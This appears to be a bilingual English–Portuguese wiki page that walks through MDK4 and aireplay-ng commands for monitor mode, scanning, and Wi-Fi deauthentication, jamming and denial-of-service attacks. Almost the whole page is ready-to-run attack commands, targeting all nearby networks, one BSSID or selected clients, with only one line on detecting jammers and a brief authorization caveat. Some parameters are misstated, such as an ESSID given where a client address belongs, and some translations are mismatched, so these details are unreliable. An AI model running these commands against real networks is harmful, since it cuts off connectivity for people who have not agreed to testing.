MDK4
Wi-Fi testing
MDK4 is a Wi-Fi testing tool used for various wireless attacks, including deauthentication and jamming. It is designed to inject frames into Wi-Fi networks on different operating systems. One common application is the Deauthentication Attack, which disrupts the connection between a device and a Wi-Fi network, forcing the device to reconnect. This can be exploited for security testing and troubleshooting purposes, but it's crucial to use such tools responsibly and with proper authorization.
To install {mdk4} Instalação sudo apt-get install mdk4 -y
user sudo su nmcli d wifi To check your interface status Para verificar o status da sua interface iwconfig
You can use monitor mode by many ways Você pode usar o modo monitor de várias maneiras airmon-ng start {interface}
by changing interface mode alterando o modo de interface airmon-ng start {interface}
by adding monitor interface mode adicionando o modo de interface do monitor iw {interface} interface add {interface} type monitor
To scan WiFi in Monitor mode Para verificar o WiFi no modo Monitor airodump-ng {interface}
Now, It's trun to attack in wifi First, i am showing full help Agora, é a vez de atacar em wi-fi. Primeiro, estou mostrando ajuda completa mdk4 --fullhelp Attack
To Jam all network which detect in your system Para bloquear todas as redes que detectam em seu sistema mdk4 {interface} d
if you want jam only one wifi then paste wifi bssid at last se você quiser bloquear apenas um wi-fi, cole o wi-fi bssid finalmente mdk4 {interface} d {BSSID}
To Jam all network by Whitelist mode which detect in your system Para bloquear toda a rede pelo modo Whitelist que detecta em seu sistema mdk4 {interface} d -w {file_name_with_path}
if you want jam only one wifi then paste wifi bssid at last se você quiser bloquear apenas um wi-fi, cole o wi-fi bssid finalmente mdk4 {interface} d -w {BSSID}
To Jam all network by Blacklist mode which detect in your system Para bloquear toda a rede pelo modo de lista negra que detecta em seu sistema mdk4 {interface} d -b {file_name_with_path}
if you want jam only one wifi then paste wifi bssid at last se você quiser bloquear apenas um wi-fi, cole o wi-fi bssid finalmente mdk4 {interface} d -b {BSSID}
To jam Wi-Fi network by channel Para bloquear a rede Wi-Fi por canal mdk4 {interface} c{channel_number}
To do Dos Attack in all Wi-Fi network mdk4 {interface} a
if you want to do Dos Attack in Only one Network Para fazer o Dos Attack em todas as redes Wi-Fi mdk4 {interface} a -a {BSSID}
Again, if you want jam Wi-Fi network by Airplay-ng Then, First, you have to set your WiFi adepter in fixed one channel Novamente, se você quiser bloquear a rede Wi-Fi por Airplay-ng Então, primeiro, você deve definir seu adepter WiFi em um canal fixo airodump-ng -c {channel_number} {interface}
Now, you can start attack by aireplay-ng To Attack for all client Agora, você pode iniciar o ataque por aireplay-ng Para atacar para todos os clientes aireplay-ng -0 0 -a {BSSID} {interface}
To Attack for one client Para atacar para um cliente aireplay-ng -0 0 -a {BSSID} -c {ESSID} {interface}
To check who is preforming WiFi Jamming Attack Para verificar quem está realizando Ataque WiFi Jamming kismet -c {interface}
Last updated